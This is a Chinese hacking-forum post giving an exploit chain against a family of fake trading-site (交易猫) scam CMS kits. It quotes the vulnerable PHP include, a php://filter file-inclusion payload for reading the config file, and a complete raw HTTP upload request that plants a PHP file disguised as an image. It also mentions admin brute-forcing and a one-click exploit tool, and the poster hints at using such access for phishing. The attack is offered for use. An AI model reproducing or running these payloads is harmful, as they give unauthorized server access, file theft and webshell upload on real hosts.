搜索
    Hi~登录注册
    您在24小时内还可以浏览0个帖子。
    请尽快登录以解除浏览限制。
    查看: 244|回复: 0
    打印 上一主题 下一主题
    收起左侧

    伪造交易猫的诈骗CMS0day利用程序

    [复制链接]

    88

    主题

    0

    精华

    192 小时

    在线时间

    密圈

    积分
    71
    跳转到指定楼层
    楼主
    发表于 2022-7-6 19:18:59 | 只看该作者 |只看大图 回帖奖励 |倒序浏览 |阅读模式

    球球各位,不要拿去发各种抖音,球球了球球了,钓鱼越来越难钓鱼了,都tm拿去发抖音了!!!!!!

    主要利用漏洞就是include的文件包含,利用伪协议进行任意文件读取,读取config文件,然后获取到后台,接着上传,再用include进行文件包含,自带后台爆破,常用的几套交易猫类型诈骗源码都把后台搞到了,也加入到了里面。

    header("Content-type: text/html; charset=utf-8");
    //公共函数库
    @$HTYP = $_GET['HTYP'];
    
    if(isset($HTYP)){
            include $HTYP;
    }

    [email]WX20220706-191425@2x.png[/email]

    能任意文件包含,但是我们得需要先读取 config目录下面得Conn.php 然后获取到后台地址。

    具体原理查阅:https://www.cnblogs.com/cmredkulaa/p/14008645.html

    /includes/global.class.php?HTYP=php://filter/read=convert.base64-encode/resource=../config/Conn.php

    得到conn.php源码

    [email]WX20220706-191544@2x.png[/email]

    接着我们在POST文件到这个地址

    POST /shayudao/pluploadajax.php HTTP/1.1
    Host: XXX.COM
    Content-Length: 102392
    User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPpYjU0StpRzQVPCc
    Accept: */*
    Origin: http://XXX.COM
    Referer: http://XXX.COM/kaliJs-ch/?Admin=Goods_Edit10&id=136
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: Aname=admin; PHPSESSID=rpp0q026pq2rq3ifpkrco5f477;
    Connection: close
    
    ------WebKitFormBoundaryPpYjU0StpRzQVPCc
    Content-Disposition: form-data; name="name"
    
    163521070339521.png
    ------WebKitFormBoundaryPpYjU0StpRzQVPCc
    Content-Disposition: form-data; name="file"; filename="1.php"
    Content-Type: image/png
    
    456546456456564
    ------WebKitFormBoundaryPpYjU0StpRzQVPCc--

    /后台木马/pluploadajax.php

    [email]WX20220706-191714@2x.png[/email]

    秒杀大部分的交易猫类型CMS

    缺点儿改名字的钱。源码想上传,但是上传了几次都不行。

    一键利用程序

    收藏收藏 顶 踩

    本站内容所有言论仅代表网友个人观点。但并不表示我们支持这些言论所代表的观点。不对网友发表的任何攻击性,或侮辱性的信息负法律责任。如果你发现他人发表带有任何攻击性,或侮辱他人的任何信息,请及时告知管理员。我们会在第一时间作出相应的处理...


    https://bbs.secgeeker.net/thread-1729-1-1.html
    回复

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表